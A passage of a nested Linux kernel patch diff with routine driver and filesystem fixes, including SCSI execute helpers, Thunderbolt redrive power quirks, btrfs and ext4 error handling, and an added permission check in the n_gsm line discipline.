++int __scsi_execute(struct scsi_device *sdev, const unsigned char *cmd,
++		 int data_direction, void *buffer, unsigned bufflen,
++		 unsigned char *sense, struct scsi_sense_hdr *sshdr,
++		 int timeout, int retries, blk_opf_t flags,
++		 req_flags_t rq_flags, int *resid)
+ {
+-	static const struct scsi_exec_args default_args;
+ 	struct request *req;
+ 	struct scsi_cmnd *scmd;
+ 	int ret;
+ 
+-	if (!args)
+-		args = &default_args;
+-	else if (WARN_ON_ONCE(args->sense &&
+-			      args->sense_len != SCSI_SENSE_BUFFERSIZE))
+-		return -EINVAL;
+-
+-	req = scsi_alloc_request(sdev->request_queue, opf, args->req_flags);
++	req = scsi_alloc_request(sdev->request_queue,
++			data_direction == DMA_TO_DEVICE ?
++			REQ_OP_DRV_OUT : REQ_OP_DRV_IN,
++			rq_flags & RQF_PM ? BLK_MQ_REQ_PM : 0);
+ 	if (IS_ERR(req))
+ 		return PTR_ERR(req);
+ 
+@@ -230,7 +232,8 @@ int scsi_execute_cmd(struct scsi_device *sdev, const unsigned char *cmd,
+ 	memcpy(scmd->cmnd, cmd, scmd->cmd_len);
+ 	scmd->allowed = retries;
+ 	req->timeout = timeout;
+-	req->rq_flags |= RQF_QUIET;
++	req->cmd_flags |= flags;
++	req->rq_flags |= rq_flags | RQF_QUIET;
+ 
+ 	/*
+ 	 * head injection *required* here otherwise quiesce won't work
+@@ -246,21 +249,20 @@ int scsi_execute_cmd(struct scsi_device *sdev, const unsigned char *cmd,
+ 	if (unlikely(scmd->resid_len > 0 && scmd->resid_len <= bufflen))
+ 		memset(buffer + bufflen - scmd->resid_len, 0, scmd->resid_len);
+ 
+-	if (args->resid)
+-		*args->resid = scmd->resid_len;
+-	if (args->sense)
+-		memcpy(args->sense, scmd->sense_buffer, SCSI_SENSE_BUFFERSIZE);
+-	if (args->sshdr)
++	if (resid)
++		*resid = scmd->resid_len;
++	if (sense && scmd->sense_len)
++		memcpy(sense, scmd->sense_buffer, SCSI_SENSE_BUFFERSIZE);
++	if (sshdr)
+ 		scsi_normalize_sense(scmd->sense_buffer, scmd->sense_len,
+-				     args->sshdr);
+-
++				     sshdr);
+ 	ret = scmd->result;
+  out:
+ 	blk_mq_free_request(req);
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL(scsi_execute_cmd);
++EXPORT_SYMBOL(__scsi_execute);
+ 
+ /*
+  * Wake up the error handler if necessary. Avoid as follows that the error
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index f32236c3f81c6..3ec9b324fdcf9 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -3299,8 +3299,8 @@ static void sd_read_block_zero(struct scsi_disk *sdkp)
+ 	put_unaligned_be32(0, &cmd[2]); /* Logical block address 0 */
+ 	put_unaligned_be16(1, &cmd[7]);	/* Transfer 1 logical block */
+ 
+-	scsi_execute_cmd(sdkp->device, cmd, REQ_OP_DRV_IN, buffer, buf_len,
+-			 SD_TIMEOUT, sdkp->max_retries, NULL);
++	scsi_execute_req(sdkp->device, cmd, DMA_FROM_DEVICE, buffer, buf_len,
++			 NULL, SD_TIMEOUT, sdkp->max_retries, NULL);
+ 	kfree(buffer);
+ }
+ 
+diff --git a/drivers/soundwire/dmi-quirks.c b/drivers/soundwire/dmi-quirks.c
+index 9ebdd0cd0b1cf..91ab97a456fa9 100644
+--- a/drivers/soundwire/dmi-quirks.c
++++ b/drivers/soundwire/dmi-quirks.c
+@@ -130,6 +130,14 @@ static const struct dmi_system_id adr_remap_quirk_table[] = {
+ 		},
+ 		.driver_data = (void *)intel_rooks_county,
+ 	},
++	{
++		/* quirk used for NUC15 LAPRC710 skew */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "LAPRC710"),
++		},
++		.driver_data = (void *)intel_rooks_county,
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc"),
+diff --git a/drivers/thermal/thermal_of.c b/drivers/thermal/thermal_of.c
+index 4104743dbc17e..202dce0d2e309 100644
+--- a/drivers/thermal/thermal_of.c
++++ b/drivers/thermal/thermal_of.c
+@@ -337,14 +337,18 @@ static int thermal_of_monitor_init(struct device_node *np, int *delay, int *pdel
+ 	int ret;
+ 
+ 	ret = of_property_read_u32(np, "polling-delay-passive", pdelay);
+-	if (ret < 0) {
+-		pr_err("%pOFn: missing polling-delay-passive property\n", np);
++	if (ret == -EINVAL) {
++		*pdelay = 0;
++	} else if (ret < 0) {
++		pr_err("%pOFn: Couldn't get polling-delay-passive: %d\n", np, ret);
+ 		return ret;
+ 	}
+ 
+ 	ret = of_property_read_u32(np, "polling-delay", delay);
+-	if (ret < 0) {
+-		pr_err("%pOFn: missing polling-delay property\n", np);
++	if (ret == -EINVAL) {
++		*delay = 0;
++	} else if (ret < 0) {
++		pr_err("%pOFn: Couldn't get polling-delay: %d\n", np, ret);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index 4ab3803e10c83..638cb5fb22c11 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -42,6 +42,12 @@ static void quirk_usb3_maximum_bandwidth(struct tb_switch *sw)
+ 	}
+ }
+ 
++static void quirk_block_rpm_in_redrive(struct tb_switch *sw)
++{
++	sw->quirks |= QUIRK_KEEP_POWER_IN_DP_REDRIVE;
++	tb_sw_dbg(sw, "preventing runtime PM in DP redrive mode\n");
++}
++
+ struct tb_quirk {
+ 	u16 hw_vendor_id;
+ 	u16 hw_device_id;
+@@ -85,6 +91,14 @@ static const struct tb_quirk tb_quirks[] = {
+ 		  quirk_usb3_maximum_bandwidth },
+ 	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HUB_40G_BRIDGE, 0x0000, 0x0000,
+ 		  quirk_usb3_maximum_bandwidth },
++	/*
++	 * Block Runtime PM in DP redrive mode for Intel Barlow Ridge host
++	 * controllers.
++	 */
++	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_80G_NHI, 0x0000, 0x0000,
++		  quirk_block_rpm_in_redrive },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_40G_NHI, 0x0000, 0x0000,
++		  quirk_block_rpm_in_redrive },
+ 	/*
+ 	 * CLx is not supported on AMD USB4 Yellow Carp and Pink Sardine platforms.
+ 	 */
+diff --git a/drivers/thunderbolt/tb.c b/drivers/thunderbolt/tb.c
+index e1eb092ad1d67..e83269dc2b067 100644
+--- a/drivers/thunderbolt/tb.c
++++ b/drivers/thunderbolt/tb.c
+@@ -1050,6 +1050,49 @@ static void tb_tunnel_dp(struct tb *tb)
+ 	pm_runtime_put_autosuspend(&in->sw->dev);
+ }
+ 
++static void tb_enter_redrive(struct tb_port *port)
++{
++	struct tb_switch *sw = port->sw;
++
++	if (!(sw->quirks & QUIRK_KEEP_POWER_IN_DP_REDRIVE))
++		return;
++
++	/*
++	 * If we get hot-unplug for the DP IN port of the host router
++	 * and the DP resource is not available anymore it means there
++	 * is a monitor connected directly to the Type-C port and we are
++	 * in "redrive" mode. For this to work we cannot enter RTD3 so
++	 * we bump up the runtime PM reference count here.
++	 */
++	if (!tb_port_is_dpin(port))
++		return;
++	if (tb_route(sw))
++		return;
++	if (!tb_switch_query_dp_resource(sw, port)) {
++		port->redrive = true;
++		pm_runtime_get(&sw->dev);
++		tb_port_dbg(port, "enter redrive mode, keeping powered\n");
++	}
++}
++
++static void tb_exit_redrive(struct tb_port *port)
++{
++	struct tb_switch *sw = port->sw;
++
++	if (!(sw->quirks & QUIRK_KEEP_POWER_IN_DP_REDRIVE))
++		return;
++
++	if (!tb_port_is_dpin(port))
++		return;
++	if (tb_route(sw))
++		return;
++	if (port->redrive && tb_switch_query_dp_resource(sw, port)) {
++		port->redrive = false;
++		pm_runtime_put(&sw->dev);
++		tb_port_dbg(port, "exit redrive mode\n");
++	}
++}
++
+ static void tb_dp_resource_unavailable(struct tb *tb, struct tb_port *port)
+ {
+ 	struct tb_port *in, *out;
+@@ -1066,7 +1109,10 @@ static void tb_dp_resource_unavailable(struct tb *tb, struct tb_port *port)
+ 	}
+ 
+ 	tunnel = tb_find_tunnel(tb, TB_TUNNEL_DP, in, out);
+-	tb_deactivate_and_free_tunnel(tunnel);
++	if (tunnel)
++		tb_deactivate_and_free_tunnel(tunnel);
++	else
++		tb_enter_redrive(port);
+ 	list_del_init(&port->list);
+ 
+ 	/*
+@@ -1092,6 +1138,7 @@ static void tb_dp_resource_available(struct tb *tb, struct tb_port *port)
+ 	tb_port_dbg(port, "DP %s resource available\n",
+ 		    tb_port_is_dpin(port) ? "IN" : "OUT");
+ 	list_add_tail(&port->list, &tcm->dp_resources);
++	tb_exit_redrive(port);
+ 
+ 	/* Look for suitable DP IN <-> DP OUT pairs now */
+ 	tb_tunnel_dp(tb);
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index f79cae48a8eab..b3fec5f8e20cd 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -27,6 +27,8 @@
+ #define QUIRK_FORCE_POWER_LINK_CONTROLLER		BIT(0)
+ /* Disable CLx if not supported */
+ #define QUIRK_NO_CLX					BIT(1)
++/* Need to keep power on while USB4 port is in redrive mode */
++#define QUIRK_KEEP_POWER_IN_DP_REDRIVE			BIT(2)
+ 
+ /**
+  * struct tb_nvm - Structure holding NVM information
+@@ -254,6 +256,7 @@ struct tb_switch {
+  *		 DMA paths through this port.
+  * @max_bw: Maximum possible bandwidth through this adapter if set to
+  *	    non-zero.
++ * @redrive: For DP IN, if true the adapter is in redrive mode.
+  *
+  * In USB4 terminology this structure represents an adapter (protocol or
+  * lane adapter).
+@@ -280,6 +283,7 @@ struct tb_port {
+ 	unsigned int ctl_credits;
+ 	unsigned int dma_credits;
+ 	unsigned int max_bw;
++	bool redrive;
+ };
+ 
+ /**
+diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
+index 6b6abce6b69f4..d2daf0a72e347 100644
+--- a/drivers/tty/n_gsm.c
++++ b/drivers/tty/n_gsm.c
+@@ -2969,6 +2969,9 @@ static int gsmld_open(struct tty_struct *tty)
+ {
+ 	struct gsm_mux *gsm;
+ 
++	if (!capable(CAP_NET_ADMIN))
++		return -EPERM;
++
+ 	if (tty->ops->write == NULL)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/usb/gadget/function/uvc_video.c b/drivers/usb/gadget/function/uvc_video.c
+index e81865978299c..be48d5ab17c7b 100644
+--- a/drivers/usb/gadget/function/uvc_video.c
++++ b/drivers/usb/gadget/function/uvc_video.c
+@@ -35,6 +35,9 @@ uvc_video_encode_header(struct uvc_video *video, struct uvc_buffer *buf,
+ 
+ 	data[1] = UVC_STREAM_EOH | video->fid;
+ 
++	if (video->queue.flags & UVC_QUEUE_DROP_INCOMPLETE)
++		data[1] |= UVC_STREAM_ERR;
++
+ 	if (video->queue.buf_used == 0 && ts.tv_sec) {
+ 		/* dwClockFrequency is 48 MHz */
+ 		u32 pts = ((u64)ts.tv_sec * USEC_PER_SEC + ts.tv_nsec / NSEC_PER_USEC) * 48;
+diff --git a/drivers/usb/host/sl811-hcd.c b/drivers/usb/host/sl811-hcd.c
+index b8b90eec91078..48478eb712119 100644
+--- a/drivers/usb/host/sl811-hcd.c
++++ b/drivers/usb/host/sl811-hcd.c
+@@ -585,6 +585,7 @@ done(struct sl811 *sl811, struct sl811h_ep *ep, u8 bank)
+ 		finish_request(sl811, ep, urb, urbstat);
+ }
+ 
++#ifdef QUIRK2
+ static inline u8 checkdone(struct sl811 *sl811)
+ {
+ 	u8	ctl;
+@@ -616,6 +617,7 @@ static inline u8 checkdone(struct sl811 *sl811)
+ #endif
+ 	return irqstat;
+ }
++#endif
+ 
+ static irqreturn_t sl811h_irq(struct usb_hcd *hcd)
+ {
+diff --git a/drivers/usb/typec/tcpm/tcpci.c b/drivers/usb/typec/tcpm/tcpci.c
+index 816945913ed0d..f649769912e53 100644
+--- a/drivers/usb/typec/tcpm/tcpci.c
++++ b/drivers/usb/typec/tcpm/tcpci.c
+@@ -875,6 +875,7 @@ MODULE_DEVICE_TABLE(i2c, tcpci_id);
+ #ifdef CONFIG_OF
+ static const struct of_device_id tcpci_of_match[] = {
+ 	{ .compatible = "nxp,ptn5110", },
++	{ .compatible = "tcpci", },
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(of, tcpci_of_match);
+diff --git a/drivers/video/fbdev/core/fbmon.c b/drivers/video/fbdev/core/fbmon.c
+index b0e690f41025a..9ca99da3a56a0 100644
+--- a/drivers/video/fbdev/core/fbmon.c
++++ b/drivers/video/fbdev/core/fbmon.c
+@@ -1311,7 +1311,7 @@ int fb_get_mode(int flags, u32 val, struct fb_var_screeninfo *var, struct fb_inf
+ int fb_videomode_from_videomode(const struct videomode *vm,
+ 				struct fb_videomode *fbmode)
+ {
+-	unsigned int htotal, vtotal;
++	unsigned int htotal, vtotal, total;
+ 
+ 	fbmode->xres = vm->hactive;
+ 	fbmode->left_margin = vm->hback_porch;
+@@ -1344,8 +1344,9 @@ int fb_videomode_from_videomode(const struct videomode *vm,
+ 	vtotal = vm->vactive + vm->vfront_porch + vm->vback_porch +
+ 		 vm->vsync_len;
+ 	/* prevent division by zero */
+-	if (htotal && vtotal) {
+-		fbmode->refresh = vm->pixelclock / (htotal * vtotal);
++	total = htotal * vtotal;
++	if (total) {
++		fbmode->refresh = vm->pixelclock / total;
+ 	/* a mode must have htotal and vtotal != 0 or it is invalid */
+ 	} else {
+ 		fbmode->refresh = 0;
+diff --git a/drivers/video/fbdev/via/accel.c b/drivers/video/fbdev/via/accel.c
+index 0a1bc7a4d7853..1e04026f08091 100644
+--- a/drivers/video/fbdev/via/accel.c
++++ b/drivers/video/fbdev/via/accel.c
+@@ -115,7 +115,7 @@ static int hw_bitblt_1(void __iomem *engine, u8 op, u32 width, u32 height,
+ 
+ 	if (op != VIA_BITBLT_FILL) {
+ 		tmp = src_mem ? 0 : src_addr;
+-		if (dst_addr & 0xE0000007) {
++		if (tmp & 0xE0000007) {
+ 			printk(KERN_WARNING "hw_bitblt_1: Unsupported source "
+ 				"address %X\n", tmp);
+ 			return -EINVAL;
+@@ -260,7 +260,7 @@ static int hw_bitblt_2(void __iomem *engine, u8 op, u32 width, u32 height,
+ 		writel(tmp, engine + 0x18);
+ 
+ 		tmp = src_mem ? 0 : src_addr;
+-		if (dst_addr & 0xE0000007) {
++		if (tmp & 0xE0000007) {
+ 			printk(KERN_WARNING "hw_bitblt_2: Unsupported source "
+ 				"address %X\n", tmp);
+ 			return -EINVAL;
+diff --git a/drivers/virtio/virtio.c b/drivers/virtio/virtio.c
+index 828ced0607423..1ef094427f299 100644
+--- a/drivers/virtio/virtio.c
++++ b/drivers/virtio/virtio.c
+@@ -489,13 +489,19 @@ EXPORT_SYMBOL_GPL(unregister_virtio_device);
+ int virtio_device_freeze(struct virtio_device *dev)
+ {
+ 	struct virtio_driver *drv = drv_to_virtio(dev->dev.driver);
++	int ret;
+ 
+ 	virtio_config_disable(dev);
+ 
+ 	dev->failed = dev->config->get_status(dev) & VIRTIO_CONFIG_S_FAILED;
+ 
+-	if (drv && drv->freeze)
+-		return drv->freeze(dev);
++	if (drv && drv->freeze) {
++		ret = drv->freeze(dev);
++		if (ret) {
++			virtio_config_enable(dev);
++			return ret;
++		}
++	}
+ 
+ 	return 0;
+ }
+diff --git a/fs/btrfs/export.c b/fs/btrfs/export.c
+index fab7eb76e53b2..58b0f04d7123f 100644
+--- a/fs/btrfs/export.c
++++ b/fs/btrfs/export.c
+@@ -161,8 +161,15 @@ struct dentry *btrfs_get_parent(struct dentry *child)
+ 	ret = btrfs_search_slot(NULL, root, &key, path, 0, 0);
+ 	if (ret < 0)
+ 		goto fail;
++	if (ret == 0) {
++		/*
++		 * Key with offset of -1 found, there would have to exist an
++		 * inode with such number or a root with such id.
++		 */
++		ret = -EUCLEAN;
++		goto fail;
++	}
+ 
+-	BUG_ON(ret == 0); /* Key with offset of -1 found */
+ 	if (path->slots[0] == 0) {
+ 		ret = -ENOENT;
+ 		goto fail;
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 9f7ffd9ef6fd7..754a9fb0165fa 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -1015,7 +1015,15 @@ static int iterate_inode_ref(struct btrfs_root *root, struct btrfs_path *path,
+ 					ret = PTR_ERR(start);
+ 					goto out;
+ 				}
+-				BUG_ON(start < p->buf);
++				if (unlikely(start < p->buf)) {
++					btrfs_err(root->fs_info,
++			"send: path ref buffer underflow for key (%llu %u %llu)",
++						  found_key->objectid,
++						  found_key->type,
++						  found_key->offset);
++					ret = -EINVAL;
++					goto out;
++				}
+ 			}
+ 			p->start = start;
+ 		} else {
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 03cfb425ea4ea..ab5d410d560e7 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -3381,7 +3381,17 @@ static int btrfs_relocate_sys_chunks(struct btrfs_fs_info *fs_info)
+ 			mutex_unlock(&fs_info->reclaim_bgs_lock);
+ 			goto error;
+ 		}
+-		BUG_ON(ret == 0); /* Corruption */
++		if (ret == 0) {
++			/*
++			 * On the first search we would find chunk tree with
++			 * offset -1, which is not possible. On subsequent
++			 * loops this would find an existing item on an invalid
++			 * offset (one less than the previous one, wrong
++			 * alignment and size).
++			 */
++			ret = -EUCLEAN;
++			goto error;
++		}
+ 
+ 		ret = btrfs_previous_item(chunk_root, path, key.objectid,
+ 					  key.type);
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index bc0ca45a5d817..a843f964332c2 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -2905,7 +2905,10 @@ static int ext4_mb_seq_groups_show(struct seq_file *seq, void *v)
+ 	for (i = 0; i <= 13; i++)
+ 		seq_printf(seq, " %-5u", i <= blocksize_bits + 1 ?
+ 				sg.info.bb_counters[i] : 0);
+-	seq_puts(seq, " ]\n");
++	seq_puts(seq, " ]");
++	if (EXT4_MB_GRP_BBITMAP_CORRUPT(&sg.info))
++		seq_puts(seq, " Block bitmap corrupted!");
++	seq_puts(seq, "\n");
+ 
+ 	return 0;
+ }
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 601e097e17207..274542d869d0c 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -6751,6 +6751,10 @@ static int ext4_write_dquot(struct dquot *dquot)
+ 	if (IS_ERR(handle))
+ 		return PTR_ERR(handle);
+ 	ret = dquot_commit(dquot);
++	if (ret < 0)
++		ext4_error_err(dquot->dq_sb, -ret,
++			       "Failed to commit dquot type %d",
++			       dquot->dq_id.type);
+ 	err = ext4_journal_stop(handle);
+ 	if (!ret)
+ 		ret = err;
+@@ -6767,6 +6771,10 @@ static int ext4_acquire_dquot(struct dquot *dquot)
+ 	if (IS_ERR(handle))
+ 		return PTR_ERR(handle);
+ 	ret = dquot_acquire(dquot);
++	if (ret < 0)
++		ext4_error_err(dquot->dq_sb, -ret,
++			      "Failed to acquire dquot type %d",
++			      dquot->dq_id.type);
+ 	err = ext4_journal_stop(handle);
+ 	if (!ret)
+ 		ret = err;
+@@ -6786,6 +6794,10 @@ static int ext4_release_dquot(struct dquot *dquot)
+ 		return PTR_ERR(handle);
+ 	}
+ 	ret = dquot_release(dquot);
++	if (ret < 0)
++		ext4_error_err(dquot->dq_sb, -ret,
++			       "Failed to release dquot type %d",
++			       dquot->dq_id.type);
+ 	err = ext4_journal_stop(handle);
+ 	if (!ret)
+ 		ret = err;
+diff --git a/fs/isofs/inode.c b/fs/isofs/inode.c
+index df9d70588b600..8a6c7fdc1d5fc 100644
+--- a/fs/isofs/inode.c
++++ b/fs/isofs/inode.c
+@@ -908,8 +908,22 @@ static int isofs_fill_super(struct super_block *s, void *data, int silent)
+ 	 * we then decide whether to use the Joliet descriptor.
+ 	 */
+ 	inode = isofs_iget(s, sbi->s_firstdatazone, 0);
+-	if (IS_ERR(inode))
+-		goto out_no_root;
++
++	/*
++	 * Fix for broken CDs with a corrupt root inode but a correct Joliet
++	 * root directory.
++	 */
++	if (IS_ERR(inode)) {
++		if (joliet_level && sbi->s_firstdatazone != first_data_zone) {
++			printk(KERN_NOTICE
++			       "ISOFS: root inode is unusable. "
++			       "Disabling Rock Ridge and switching to Joliet.");
++			sbi->s_rock = 0;
++			inode = NULL;
++		} else {
++			goto out_no_root;
++		}
++	}
+ 
+ 	/*
+ 	 * Fix for broken CDs with Rock Ridge and empty ISO root directory but
+diff --git a/fs/orangefs/super.c b/fs/orangefs/super.c
+index 5254256a224d7..4ca8ed410c3cf 100644
+--- a/fs/orangefs/super.c
++++ b/fs/orangefs/super.c
+@@ -527,7 +527,7 @@ struct dentry *orangefs_mount(struct file_system_type *fst,
+ 	sb->s_fs_info = kzalloc(sizeof(struct orangefs_sb_info_s), GFP_KERNEL);
+ 	if (!ORANGEFS_SB(sb)) {
+ 		d = ERR_PTR(-ENOMEM);
+-		goto free_sb_and_op;
++		goto free_op;
+ 	}
+ 
+ 	ret = orangefs_fill_sb(sb,
+diff --git a/fs/pstore/zone.c b/fs/pstore/zone.c
+index 2770746bb7aa1..abca117725c81 100644
+--- a/fs/pstore/zone.c
++++ b/fs/pstore/zone.c
+@@ -973,6 +973,8 @@ static ssize_t psz_kmsg_read(struct pstore_zone *zone,
+ 		char *buf = kasprintf(GFP_KERNEL, "%s: Total %d times\n",
+ 				      kmsg_dump_reason_str(record->reason),
+ 				      record->count);
++		if (!buf)
++			return -ENOMEM;
+ 		hlen = strlen(buf);
+ 		record->buf = krealloc(buf, hlen + size, GFP_KERNEL);
+ 		if (!record->buf) {
+diff --git a/fs/sysv/itree.c b/fs/sysv/itree.c
+index 9925cfe571595..17c7d76770a0a 100644
+--- a/fs/sysv/itree.c
++++ b/fs/sysv/itree.c
+@@ -82,9 +82,6 @@ static inline sysv_zone_t *block_end(struct buffer_head *bh)
+ 	return (sysv_zone_t*)((char*)bh->b_data + bh->b_size);
+ }
+ 
+-/*
+- * Requires read_lock(&pointers_lock) or write_lock(&pointers_lock)
+- */
+ static Indirect *get_branch(struct inode *inode,
+ 			    int depth,
+ 			    int offsets[],
+@@ -104,15 +101,18 @@ static Indirect *get_branch(struct inode *inode,
+ 		bh = sb_bread(sb, block);
+ 		if (!bh)
+ 			goto failure;
++		read_lock(&pointers_lock);
+ 		if (!verify_chain(chain, p))
+ 			goto changed;
+ 		add_chain(++p, bh, (sysv_zone_t*)bh->b_data + *++offsets);
++		read_unlock(&pointers_lock);
+ 		if (!p->key)
+ 			goto no_block;
+ 	}
+ 	return NULL;
+ 
+ changed:
++	read_unlock(&pointers_lock);
+ 	brelse(bh);
+ 	*err = -EAGAIN;
+ 	goto no_block;
+@@ -218,9 +218,7 @@ static int get_block(struct inode *inode, sector_t iblock, struct buffer_head *b
+ 		goto out;
+ 
+ reread:
+-	read_lock(&pointers_lock);
+ 	partial = get_branch(inode, depth, offsets, chain, &err);
+-	read_unlock(&pointers_lock);
+ 
+ 	/* Simplest case - block found, no allocation needed */
+ 	if (!partial) {
+@@ -290,9 +288,9 @@ static Indirect *find_shared(struct inode *inode,
+ 	*top = 0;
+ 	for (k = depth; k > 1 && !offsets[k-1]; k--)
+ 		;
++	partial = get_branch(inode, k, offsets, chain, &err);
+ 
+ 	write_lock(&pointers_lock);
+-	partial = get_branch(inode, k, offsets, chain, &err);
+ 	if (!partial)
+ 		partial = chain + k-1;
+ 	/*
+diff --git a/include/linux/randomize_kstack.h b/include/linux/randomize_kstack.h
+index 5d868505a94e4..6d92b68efbf6c 100644
+--- a/include/linux/randomize_kstack.h
++++ b/include/linux/randomize_kstack.h
+@@ -80,7 +80,7 @@ DECLARE_PER_CPU(u32, kstack_offset);
+ 	if (static_branch_maybe(CONFIG_RANDOMIZE_KSTACK_OFFSET_DEFAULT,	\
+ 				&randomize_kstack_offset)) {		\
+ 		u32 offset = raw_cpu_read(kstack_offset);		\
+-		offset ^= (rand);					\
++		offset = ror32(offset, 5) ^ (rand);			\
+ 		raw_cpu_write(kstack_offset, offset);			\
+ 	}								\
+ } while (0)
+diff --git a/include/linux/rcupdate.h b/include/linux/rcupdate.h
+index 319698087d66a..6858cae98da9e 100644
+--- a/include/linux/rcupdate.h
++++ b/include/linux/rcupdate.h
+@@ -205,9 +205,9 @@ void rcu_tasks_trace_qs_blkd(struct task_struct *t);
+ 	do {									\
+ 		int ___rttq_nesting = READ_ONCE((t)->trc_reader_nesting);	\
+ 										\
+-		if (likely(!READ_ONCE((t)->trc_reader_special.b.need_qs)) &&	\
++		if (unlikely(READ_ONCE((t)->trc_reader_special.b.need_qs) == TRC_NEED_QS) &&	\
+ 		    likely(!___rttq_nesting)) {					\
+-			rcu_trc_cmpxchg_need_qs((t), 0,	TRC_NEED_QS_CHECKED);	\
++			rcu_trc_cmpxchg_need_qs((t), TRC_NEED_QS, TRC_NEED_QS_CHECKED);	\
+ 		} else if (___rttq_nesting && ___rttq_nesting != INT_MIN &&	\
+ 			   !READ_ONCE((t)->trc_reader_special.b.blocked)) {	\
+ 			rcu_tasks_trace_qs_blkd(t);				\
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index c4a8520dc748f..d5f888fe0e331 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -2603,6 +2603,8 @@ static inline void skb_put_u8(struct sk_buff *skb, u8 val)
+ void *skb_push(struct sk_buff *skb, unsigned int len);
+ static inline void *__skb_push(struct sk_buff *skb, unsigned int len)
+ {
++	DEBUG_NET_WARN_ON_ONCE(len > INT_MAX);
++
+ 	skb->data -= len;
+ 	skb->len  += len;
+ 	return skb->data;
+@@ -2611,6 +2613,8 @@ static inline void *__skb_push(struct sk_buff *skb, unsigned int len)
+ void *skb_pull(struct sk_buff *skb, unsigned int len);
+ static inline void *__skb_pull(struct sk_buff *skb, unsigned int len)
+ {
++	DEBUG_NET_WARN_ON_ONCE(len > INT_MAX);
++
+ 	skb->len -= len;
+ 	if (unlikely(skb->len < skb->data_len)) {
+ #if defined(CONFIG_DEBUG_NET)
+@@ -2634,6 +2638,8 @@ void *__pskb_pull_tail(struct sk_buff *skb, int delta);
+ 
+ static inline bool pskb_may_pull(struct sk_buff *skb, unsigned int len)
+ {
++	DEBUG_NET_WARN_ON_ONCE(len > INT_MAX);
++
+ 	if (likely(len <= skb_headlen(skb)))
+ 		return true;
+ 	if (unlikely(len > skb->len))
+@@ -2796,6 +2802,11 @@ static inline void skb_set_inner_network_header(struct sk_buff *skb,
+ 	skb->inner_network_header += offset;
+ }
+ 
++static inline bool skb_inner_network_header_was_set(const struct sk_buff *skb)
++{
++	return skb->inner_network_header > 0;
++}
++
+ static inline unsigned char *skb_inner_mac_header(const struct sk_buff *skb)
+ {
+ 	return skb->head + skb->inner_mac_header;
+diff --git a/include/linux/sunrpc/sched.h b/include/linux/sunrpc/sched.h
+index 8ada7dc802d30..8f9bee0e21c3b 100644
+--- a/include/linux/sunrpc/sched.h
++++ b/include/linux/sunrpc/sched.h
+@@ -186,7 +186,7 @@ struct rpc_wait_queue {
+ 	unsigned char		maxpriority;		/* maximum priority (0 if queue is not a priority queue) */
+ 	unsigned char		priority;		/* current priority */
+ 	unsigned char		nr;			/* # tasks remaining for cookie */
+-	unsigned short		qlen;			/* total # tasks waiting in queue */
++	unsigned int		qlen;			/* total # tasks waiting in queue */
+ 	struct rpc_timer	timer_list;
+ #if IS_ENABLED(CONFIG_SUNRPC_DEBUG) || IS_ENABLED(CONFIG_TRACEPOINTS)
+ 	const char *		name;
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index a64713fe52640..1504d3137cc69 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -480,51 +480,28 @@ extern const char *scsi_device_state_name(enum scsi_device_state);
+ extern int scsi_is_sdev_device(const struct device *);
+ extern int scsi_is_target_device(const struct device *);
+ extern void scsi_sanitize_inquiry_string(unsigned char *s, int len);
+-
+-/* Optional arguments to scsi_execute_cmd */
+-struct scsi_exec_args {
+-	unsigned char *sense;		/* sense buffer */
+-	unsigned int sense_len;		/* sense buffer len */
+-	struct scsi_sense_hdr *sshdr;	/* decoded sense header */
+-	blk_mq_req_flags_t req_flags;	/* BLK_MQ_REQ flags */
+-	int *resid;			/* residual length */
+-};
+-
+-int scsi_execute_cmd(struct scsi_device *sdev, const unsigned char *cmd,
+-		     blk_opf_t opf, void *buffer, unsigned int bufflen,
+-		     int timeout, int retries,
+-		     const struct scsi_exec_args *args);
+-
++extern int __scsi_execute(struct scsi_device *sdev, const unsigned char *cmd,
++			int data_direction, void *buffer, unsigned bufflen,
++			unsigned char *sense, struct scsi_sense_hdr *sshdr,
++			int timeout, int retries, blk_opf_t flags,
++			req_flags_t rq_flags, int *resid);
+ /* Make sure any sense buffer is the correct size. */
+-#define scsi_execute(_sdev, _cmd, _data_dir, _buffer, _bufflen, _sense,	\
+-		     _sshdr, _timeout, _retries, _flags, _rq_flags,	\
+-		     _resid)						\
++#define scsi_execute(sdev, cmd, data_direction, buffer, bufflen, sense,	\
++		     sshdr, timeout, retries, flags, rq_flags, resid)	\
+ ({									\
+-	scsi_execute_cmd(_sdev, _cmd, (_data_dir == DMA_TO_DEVICE ?	\
